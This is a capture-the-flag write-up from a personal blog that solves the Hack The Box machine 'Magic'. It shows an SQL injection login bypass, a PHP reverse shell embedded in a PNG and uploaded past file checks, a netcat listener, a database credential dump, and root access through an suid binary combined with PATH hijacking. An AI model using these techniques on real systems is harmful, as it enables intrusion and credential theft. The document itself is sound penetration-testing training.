[hackthebox]Magic

Pre-requisite

There are a few things you need to understand before attempting this machine, else playing this machine will be very difficult and the members in HTB will not leak any information for you, they will only “nudge” you towards the direction to solve the user and root puzzles, so without some pre-requisites nudging can be quite clueless for you.

  1. Simple sql injection, you need to do thing like this ' or 1=1#'.
  2. Know how to use burpsuite (community edition) to do web traffic interception, you will need to intercept the client response and modify it then send to the server
  3. suid exploit, I recommend this article if you do not know about suid exploit. You need to know how to identify it and exploit it, though the exploit examples in the article are not in Magic.
  4. Understand the impact of linux path misconfiguration, I strongly recommend this article, after i read the path misconfiguration section I got Magic pwned.
  5. Remote file inclusion, you need to upload a file to Magic which embeds reverse shell script and to bypass the file extension and header checks.
  6. Get an interactive terminal after you have got a shell, this makes working on your target easier, read this article which introduces method3 to upgrade netcat with magic.
  7. Learn how to do mysql dump after you have got username and password of a database, read this article for information.

Lastly I recommend you to read the post by g0tmi1k, this cheat sheet made by him is very valuable.

Enumeration with NMAP

nmap -sC -sV -oN magic -vvv 10.10.10.185
magic1

I have played with active and retired machines and all of them do not brute force the ssh, so do not bother the ssh service, instead focus on http web service.

Enumerate with dirb

I would recommend gobuster or dirbuster as they have threading, moreover gobuster can enumerate vhost, but using dirb is alright as well, here are the result dirb http://10.10.10.185, this command uses the default wordlist to enumerate directories.
magic2

Later I understand amongst the directories and files found only http://10.10.10.185/images/uploads/ is useful.

Bypass authentication

This is the main page of Magic, the function is for you to login and upload your pictures which accepts jpg, jpeg and png.
magic3

I cannot put whitespaces in the username field, but you can bypass this restriction if you have a history in your browser, or you can use a man-in-the-middle tool like burpsuite to help you modify the payload.
magic4

Set up burpsuite as follows:
magic5
Include the Magic ip address in the scope.
Include the scope in Intercept Client Requests.
magic6

Set up the proxy in firefox.
magic7magic8

Put in arbitrary username and password and submit.
magic9

magic10

Use https://www.urlencoder.org/ to convert this string ' or 1=1#
magic11

Modify the value of username variable and forward the request.
magic12

You will see an upload picture page.
magic13
You can disable the proxy as it is not needed anymore.

Remote file inclusion

I have tested that Magic checks for header of the file and the file extension hence I could not convert a php reverse shell script extension to jpg or png format. I downloaded a valid png image file and use exiftool to embed a php reverse shell within the picture.

To install exiftool in kali linux apt install libimage-exiftool-perl.

I tried a few php scripts but it did not work, I recommend this script by pentestmonkey which always works. I need to modify the ip address and the port number within the script before using it.
magic17

I downloaded a png image file and the script from pentestmonkey, I embed the script into the png file with this exiftool -DocumentName="$(cat php-reverse-shell.php)" x.png then do php extension obfuscation by mv x.png x.php.png
magic14

Upload the scripted image file:
magic15

Successful upload will have the text display otherwise I will see a javascript alert.
magic16

Get the shell

On my attacker machine I will set up a netcat to listen at 4444 nc -lvnp 4444. I then run the script from the web with this path http://http://10.10.10.185/images/uploads/x.php.png
magic18
You need to take note that as soon as you have uploaded the scripted image file you need to run it because the Magic has a cron job that periodically “cleans up” the machine.

I need to upgrade the current netcat shell with magic, first I use this python3 -c "import pty;pty.spawn('/bin/bash')"
magic19
Then on my keyboard I do CTRL-Z to make the nc to the background, then I use stty raw -echo, then I type fg which makes the background nc to the foreground, then type reset.
magic21

Get the user flag

First go to the home directory of the username I assumed which is www-data, cd ~/, ls -lah, I found the directory Magic.
magic22

Go to the Magic directory and I found an interesting file db.php5, this file contains the database username and password.
magic23
Unfortunately this password is not theseus’ linux password, also I have found that I cannot ssh with theseus.
magic24

But I can use the database credential to do mysql dump, mysqldump -u theseus -p Magic > magic.dump
magic25

within the dump I found a password, this password can be used to change to user theseus.
magic26

magic27

Find suid enabled binary file

This is a pre-requisite for getting the root flag. First of all understand what groups does theseus belong to.
magic28

Theseus is part of the users group, hence I am going to find a file that can be executed by theseus and has suid enabled find / -type f -perm -u=s -gid 100 2>/dev/null
There is one file that satisfies both requirement:
magic29

sysinfo gets the hardware info, cpuinfo, hard disk space and memory info.

Understanding what sysinfo is doing

By using strings /bin/sysinfo there are 4 commands used by sysinfo.
magic30, to understand this behaviour I downloaded pspy64, this program helps to understand the processes when command is executed. To understand the processes called by sysinfo in real time.

I downloaded the pspy into my attacker machine then setup a simple http server with python python3 -m http.server 80
magic31

On the Magic machine, I download the pspy64 into /tmp
magic32

First run pspy64 in the background ./pspy64&
magic33

Run sysinfo.
magic34magic35magic36magic37
Then turn off the pspy64 use fg then CTRL-C to terminate.
magic38

As observed from the pspy64 output I noticed the cat, fdisk, free and lshw are all run by root (uid 0), this can be exploited not directly but indirectly by misconfiguring the PATH.
export PATH=.:$PATH, this is a dangerous PATH configuration which is a wildcard for all location .. With this I can “impersonate” any programs run by sysinfo.
magic39

Privilege escalation: Get the root flag

Misconfigure the path allow me to “impersonate” any programs run by sysinfo, I can read the root by doing the bash script but name it as free.

#!/bin/bash
reset; sh 1>&0 2>&0

magic40
run sysinfo theseus becomes root.
magic41

Change to interactive mode for easier usage /bin/bash -i
magic42

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s